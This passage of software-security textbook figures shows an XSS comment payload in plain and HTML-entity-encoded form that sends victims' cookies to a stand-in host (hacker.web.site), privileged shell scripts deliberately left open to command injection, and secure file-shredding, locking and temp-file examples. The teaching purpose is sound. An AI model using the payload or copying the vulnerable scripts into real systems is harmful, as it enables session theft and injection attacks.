document.cookie</script>

(a) Plain XSS example

Thanks for this information, its great!

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;

&#46;&#108;&#111;&#99;&#97;&#116;&#105;&#111;

&#110;&#61;&#39;&#104;&#116;&#116;&#112;&#58;

&#47;&#47;&#104;&#97;&#99;&#107;&#101;&#114;

&#46;&#119;&#101;&#98;&#46;&#115;&#105;&#116;

&#101;&#47;&#99;&#111;&#111;&#107;&#105;&#101;

&#46;&#99;&#103;&#105;&#63;&#39;&#43;&#100;

&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;

&#99;&#111;&#111;&#107;&#105;&#101;&#60;&#47;

&#115;&#99;&#114;&#105;&#112;&#116;&#62;

(b) Encoded XSS example

Figure 11.5 XSS Example


#!/bin/bash

user=`echo $1 | sed 's/@.*$//'`

grep $user /var/local/accounts/ipaddrs

(a) Example vulnerable privileged shell script

#!/bin/bash

PATH="/sbin:/bin:/usr/sbin:/usr/bin"

export PATH

user=`echo $1 | sed 's/@.*$//'`

grep $user /var/local/accounts/ipaddrs

(b) Still vulnerable privileged shell script

Figure 11.6 Vulnerable Shell Scripts


patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]

open file for writing

for each pattern

seek to start of file

overwrite file contents with pattern

close file

remove file

(a) Initial secure file shredding program algorithm

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ]

open file for update

for each pattern

seek to start of file

overwrite file contents with pattern

flush application write buffers

sync file system write buffers with device

close file

remove file

(b) Better secure file shredding program algorithm

Figure 11.7 Example Global Data Overflow Attack
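A minimal C sketch of the improved algorithm in part (b), assuming POSIX I/O (the abbreviated pattern list and the function name shred are illustrative): fflush() empties the application's write buffers and fsync() forces the file system's buffers to the device, so each pattern actually reaches the disk before the next pass.

#include <stdio.h>
#include <unistd.h>

/* overwrite a file of known size with each pattern in turn,
   forcing the data to the device on every pass, then remove it */
int shred(const char *path, long size)
{
    static const unsigned char patterns[] =
        { 0xAA, 0x55, 0xCC, 0x33, 0x00, 0xFF };
    FILE *f = fopen(path, "r+b");          /* open file for update */
    if (f == NULL)
        return -1;
    for (size_t i = 0; i < sizeof(patterns); i++) {
        fseek(f, 0L, SEEK_SET);            /* seek to start of file */
        for (long n = 0; n < size; n++)    /* overwrite file contents */
            fputc(patterns[i], f);
        fflush(f);                         /* flush application write buffers */
        fsync(fileno(f));                  /* sync file system buffers with device */
    }
    fclose(f);                             /* close file */
    return remove(path);                   /* remove file */
}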


#!/usr/bin/perl

#

$EXCL_LOCK = 2;

$UNLOCK = 8;

$FILENAME = "forminfo.dat";

# open data file and acquire exclusive access lock

open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n";

flock FILE, $EXCL_LOCK;

… use exclusive access to the forminfo file to save details

# unlock and close file

flock FILE, $UNLOCK;

close(FILE);

Figure 11.8 Perl File Locking Example
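The same exclusive-locking pattern can be sketched in C, assuming a system providing the BSD flock() call (the Perl constants 2 and 8 above correspond to LOCK_EX and LOCK_UN); the filename is illustrative.

#include <fcntl.h>
#include <stdio.h>
#include <sys/file.h>
#include <unistd.h>

int main(void)
{
    /* open data file and acquire exclusive access lock */
    int fd = open("forminfo.dat", O_WRONLY | O_CREAT | O_APPEND, 0600);
    if (fd == -1) {
        perror("open");
        return 1;
    }
    flock(fd, LOCK_EX);    /* blocks until exclusive access is granted */

    /* ... use exclusive access to the forminfo file to save details ... */

    flock(fd, LOCK_UN);    /* unlock and close file */
    close(fd);
    return 0;
}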

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

char *filename;
int fd;

do {    /* O_CREAT|O_EXCL fails if the name exists; 0600 is owner-only */
    filename = tempnam (NULL, "foo");
    fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
    free (filename);
} while (fd == -1);

Figure 11.9 C Temporary File Creation Example